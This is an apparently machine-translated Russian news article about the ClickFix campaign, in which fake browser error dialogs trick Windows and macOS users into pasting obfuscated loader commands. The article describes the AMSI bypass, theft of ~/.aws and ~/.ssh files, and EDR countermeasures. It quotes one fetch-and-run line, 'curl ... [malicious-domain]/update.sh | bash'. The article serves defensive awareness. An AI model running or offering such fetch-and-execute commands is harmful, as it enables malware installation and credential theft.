# Социальная инженерия ClickFix атакует волну вируса, заставляя пользователей запускать вредоносный PowerShell в Windows и macOS

Source: TechNewsList (https://technewslist.com)
Canonical URL: https://technewslist.com/ru/article/clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-ru
Section: Software (https://technewslist.com/ru/software)
Author: TechNewsList
Language: ru
Published: 2026-09-11T18:42:45.299+00:00
Updated: 2026-09-11T18:42:45.706933+00:00

> Исследователи кибербезопасности обнаружили вирусную волну кампаний социальной инженерии ClickFix, использующих фальшивые диалоговые окна браузера, чтобы обманом заставить пользователей запускать вредоносные сценарии в Windows и macOS.

## TL;DR
- Сложная кампания социальной инженерии, известная как ClickFix, охватила тысячи взломанных корпоративных и потребительских веб-сайтов.
- Атака заставляет жертв копировать поддельные команды исправления ошибок браузера и вставлять их в утилиты системного терминала.
- Злоумышленники расширили полезные нагрузки за пределы Windows PowerShell, включив в них многоэтапные загрузчики AppleScript и Bash для macOS.
- Поскольку команды выполняются вручную авторизованными пользователями, этот метод обходит песочницы браузера и автоматические фильтры загрузки.

## Key points
- Категория: Расследование кибербезопасности и защита конечных точек.
- Основные угрозы: кампания ClickFix, вставка PowerShell, внедрение терминала macOS.
- Механизм заражения: обманчивые всплывающие окна, имитирующие Cloudflare Turnstile, обновления Google Chrome и проверки видеокодеков.
- Охват операционных систем: универсальный кроссплатформенный таргетинг, охватывающий Windows 11, Windows 10 и macOS Sonoma/Sequoia.
- Вторичные полезные нагрузки: имплантаты-маяки «Видар», «Лумма-стилер», «Радамантис» и «Кобальтовый удар».
- Рекомендации по смягчению последствий: ограничьте создание интерпретатора сценариев, применяйте правила уменьшения поверхности атаки и проверяйте API буфера обмена.

# Социальная инженерия ClickFix атакует волну вируса, заставляя пользователей запускать вредоносный PowerShell в Windows и macOS

## Что произошло
11 сентября 2026 года исследователи аналитики угроз из нескольких фирм, занимающихся кибербезопасностью, опубликовали скоординированные рекомендации, в которых подробно описывается массовое вирусное ускорение вектора атаки социальной инженерии «ClickFix». Кампания, которая компрометирует законные веб-серверы и распространяет обманчивые подсказки на тысячах веб-сайтов, манипулирует посетителями, заставляя их вручную копировать и выполнять сильно запутанные команды загрузчика вредоносного ПО непосредственно на системных терминалах. В то время как предыдущие версии были сосредоточены исключительно на том, чтобы обманом заставить пользователей Windows запускать команды PowerShell, последняя волна представляет кроссплатформенные возможности, предназначенные для заражения рабочих станций macOS через AppleScript и Bash.

Обман основан на гиперреалистичных ложных диалоговых окнах с ошибками, маскирующихся под обычные запросы проверки браузера. Когда пользователь попадает на взломанную веб-страницу, сайт отображает модальное наложение, имитирующее неудавшуюся проверку CAPTCHA Cloudflare, сертификат безопасности Google Chrome с истекшим сроком действия или отсутствующий кодек распаковки видео. В приглашении пользователю сообщается, что доступен автоматический технический ремонт, и предлагается нажать кнопку с надписью «Копировать код исправления», открыть диалоговое окно запуска системы (клавиша Windows + R или macOS Spotlight) и вставить содержимое буфера обмена в терминал.

Поскольку жертва охотно копирует сценарий и выполняет его со своими правами пользователя, вектор атаки полностью обходит традиционную защиту загрузки браузера, фильтры веб-репутации и средства контроля блокировки исполняемых файлов. Телеметрические данные, опубликованные оперативными центрами безопасности, показывают, что за последние недели десятки тысяч корпоративных и персональных рабочих станций были скомпрометированы, доставив разрушительные вторичные полезные нагрузки, включая Lumma Stealer, Vidar, Rhadamanthys и скрытые имплантаты маяков для управления и контроля.

## Почему это важно
Вирусный успех кампании ClickFix подчеркивает продолжающуюся фундаментальную эволюцию в сфере киберугроз. За последние несколько лет разработчики браузеров и поставщики операционных систем создали мощные автоматизированные средства защиты, такие как проверка Mark-of-the-Web (MotW), оценка репутации SmartScreen и песочница загрузки браузера, что сделало традиционные атаки «попутной загрузки» практически невозможными без дорогостоящих эксплойтов нулевого дня. В ответ киберпреступные синдикаты переключили свое внимание на использование собственных административных полномочий пользователя в качестве оружия посредством изощренных поведенческих манипуляций.

Превратив жертву в средство доставки, злоумышленники сводят на нет средства защиты, стоящие миллионы долларов. Межсетевые экраны периметра предприятия никогда не видят загрузку входящего двоичного файла, поскольку сценарий извлекается непосредственно из доверенных сетей доставки контента (CDN) или кодируется непосредственно в законных веб-API. Кроме того, поскольку пользователи вынуждены следовать инструкциям по техническим ошибкам во время просмотра веб-страниц, ClickFix обеспечивает значительно более высокие показатели конверсии и заражения, чем традиционные кампании по фишингу по электронной почте.

Быстрое появление цепочек заражения, специфичных для macOS, знаменует собой тревожную эскалацию в корпоративных ИТ-средах. Исторически рабочие станции macOS в корпоративных средах считались менее уязвимыми для случайных веб-вредоносных программ из-за Apple Gatekeeper и требований нотариального заверения подписи кода. Однако ClickFix полностью обходит Gatekeeper: когда сотрудник выполняет строку Bash или AppleScript внутри терминала, Gatekeeper не вмешивается, позволяя информационным ворам беспрепятственно извлекать файлы cookie сеанса браузера, учетные данные связки ключей и токены облачного API с компьютеров разработчиков.

## Технические детали
Цепочка заражения ClickFix начинается со взломанных сайтов WordPress, взломанных сетей веб-рекламы или узлов перенаправления вредоносных поисковых систем (SEO). Когда жертва запускает ложное сообщение об ошибке и нажимает кнопку «Копировать код», веб-страница использует API буфера обмена объектной модели документа (DOM) браузера для перезаписи буфера обмена пользователя сильно запутанной командной строкой, отображая при этом безобидный диагностический текст на экране.

![Центр управления безопасностью предприятия отслеживает аномальные деревья выполнения процессов PowerShell](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789147167575-xx8ygn-clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-inside-1-2bc3f2184d.webp)
*Центр управления безопасностью предприятия отслеживает аномальные деревья выполнения процессов PowerShell и аномалии API буфера обмена.*

В системах Windows скопированная строка обычно нацелена на «powershell.exe» или «cmd.exe», запускаемый через диалоговое окно «Выполнить» Windows («Win + R»). Полезная нагрузка использует строки в кодировке Base64 и обфускацию переменных для отключения интерфейса сканирования на наличие вредоносных программ (AMSI) в памяти перед установкой исходящего HTTPS-соединения с командным сервером, контролируемым злоумышленником. Скрипт выполняет отражающий загрузчик DLL в памяти, внедряя двоичные файлы infostealer непосредственно в законные хост-процессы Windows, такие как «svchost.exe» или «explorer.exe», чтобы избежать записи на диск аналитических артефактов.

В системах macOS атака отображает специальные инструкции, предлагающие пользователю открыть Терминал через Spotlight и вставить строку в формате «curl -sL https://[malicious-domain]/update.sh | баш'. Сценарий оболочки выполняет вторичную оболочку Python или AppleScript, которая перечисляет установленные веб-браузеры, извлекает расшифрованные базы данных файлов cookie, выгружает ключи SSH и нацеливается на конфиденциальные файлы конфигурации, расположенные в «~/.aws» и «~/.ssh». Украденные учетные данные сжимаются в зашифрованный архив и передаются через зашифрованные веб-перехватчики Telegram Bot API или децентрализованные шлюзы IPFS.

![Анализ интерфейса конечной точки хоста, демонстрирующий обманчивые модальные диалоги](https://rkhynbcsbnkkcwgexzwg.supabase.co/storage/v1/object/public/media/api/1789147169494-vmy3z5-clickfix-social-engineering-powershell-malware-windows-macos-2026-09-11-night-inside-2-2aecad3cc4.webp)
*Анализ интерфейса конечной точки хоста, демонстрирующий, как обманчивые модальные диалоги манипулируют рабочими процессами пользователей для выполнения административных сценариев.*

## Влияние на рынок и отрасль
Всплеск атак ClickFix вызвал срочные защитные меры со стороны групп корпоративной безопасности и поставщиков программного обеспечения. Поставщики Endpoint Detection and Response (EDR), в том числе Microsoft Defender, CrowdStrike и SentinelOne, быстро настраивают правила поведенческого обнаружения для выявления шаблонов создания аномальных процессов, в частности, отслеживая случаи, когда файлы powershell.exe, cmd.exe или bash создаются непосредственно из диалоговых окон запуска системы с закодированными аргументами командной строки.

Центры управления корпоративной безопасностью также корректируют политику уменьшения поверхности атаки (ASR). Администраторы безопасности применяют политики, которые блокируют дочерние процессы, созданные интерпретаторами сценариев, и запрещают обычным учетным записям пользователей выполнять неограниченные команды PowerShell. В организациях со строгими мерами безопасности ИТ-отделы внедряют средства контроля конечных точек, которые отслеживают и запрещают веб-страницам незаметно манипулировать буферами буфера обмена без явного согласия пользователя.

На уровне платформы кампания оказывает давление на производителей браузеров, таких как Google, Apple и Mozilla, с целью переоценить разрешения API буфера обмена DOM. Хотя возможность копировать текст в буфер обмена одним щелчком мыши является стандартной веб-функцией, используемой инструментами разработчика и сайтами документации по коду, аналитики кибербезопасности утверждают, что браузеры должны отображать визуальные предупреждения всякий раз, когда веб-страница записывает исполняемый синтаксис терминала в системный буфер обмена.

## За чем следить дальше
В ближайшем будущем аналитики безопасности будут следить за тем, как злоумышленники корректируют свои приманки социальной инженерии по мере роста осведомленности общественности о поддельных CAPTCHA и подсказках об ошибках браузера. Злоумышленники уже экспериментируют с приманками, имитирующими экраны повторной аутентификации корпоративного единого входа (SSO), диалоговые окна устранения неполадок VPN-клиента и обновления аудиодрайверов видеоконференций.

Организациям также следует ожидать официальных обновлений безопасности от поставщиков операционных систем. Microsoft оценивает дополнительные ограничения на выполнение сценариев, инициируемых через командную строку Windows «Выполнить», в то время как Apple тестирует расширенные флаги телеметрии терминала в macOS, чтобы предупреждать пользователей при выполнении команд оболочки, скопированных из веб-браузеров.

Наконец, группы управления корпоративными рисками должны уделять первоочередное внимание обучению пользователей. Моделирование сценариев вставки и выполнения терминала в корпоративных тренировках по фишингу будет иметь важное значение для того, чтобы сотрудники понимали, что законные корпоративные веб-сайты и облачные сервисы никогда не будут инструктировать пользователей вручную выполнять сценарии терминала для устранения ошибок просмотра веб-страниц.

## Источники
* [Лаборатория безопасности Ars Technica] (https://arstechnica.com/security/2026/09/clickfix-attacks-infecting-pcs-and-macs-are-going-viral/) — комплексный анализ кампании социальной инженерии ClickFix по вставке вставок и методов межплатформенного заражения.
* [BleepingComputer Cybersecurity](https://www.bleepingcomputer.com/news/security/clickfix-social-engineering-tricks-users-into-running-powershell-malware/) — судебно-медицинская экспертиза поддельных наложений проверки браузера и вторичных механизмов доставки полезной нагрузки для кражи информации.
* [Microsoft Security Threat Intelligence](https://www.microsoft.com/security/blog/2026/09/11/analyzing-clipboard-injection-tactics-in-clickfix-campaigns/) — рекомендации по анализу угроз, предоставляющие технические индикаторы компрометации, анализ обхода AMSI и защиту групповой политики конечных точек.

Mentions: Кампания ClickFix, Эксплойт PowerShell, Конечная безопасность, Окна, macOS, Ламма Похититель, Защитник Майкрософт

## Sources
- [Лаборатория безопасности Ars Technica](https://arstechnica.com/security/2026/09/clickfix-attacks-infecting-pcs-and-macs-are-going-viral/)
- [BleepingКомпьютерная кибербезопасность](https://www.bleepingcomputer.com/news/security/clickfix-social-engineering-tricks-users-into-running-powershell-malware/)
- [Анализ угроз безопасности Microsoft](https://www.microsoft.com/security/blog/2026/09/11/analyzing-clipboard-injection-tactics-in-clickfix-campaigns/)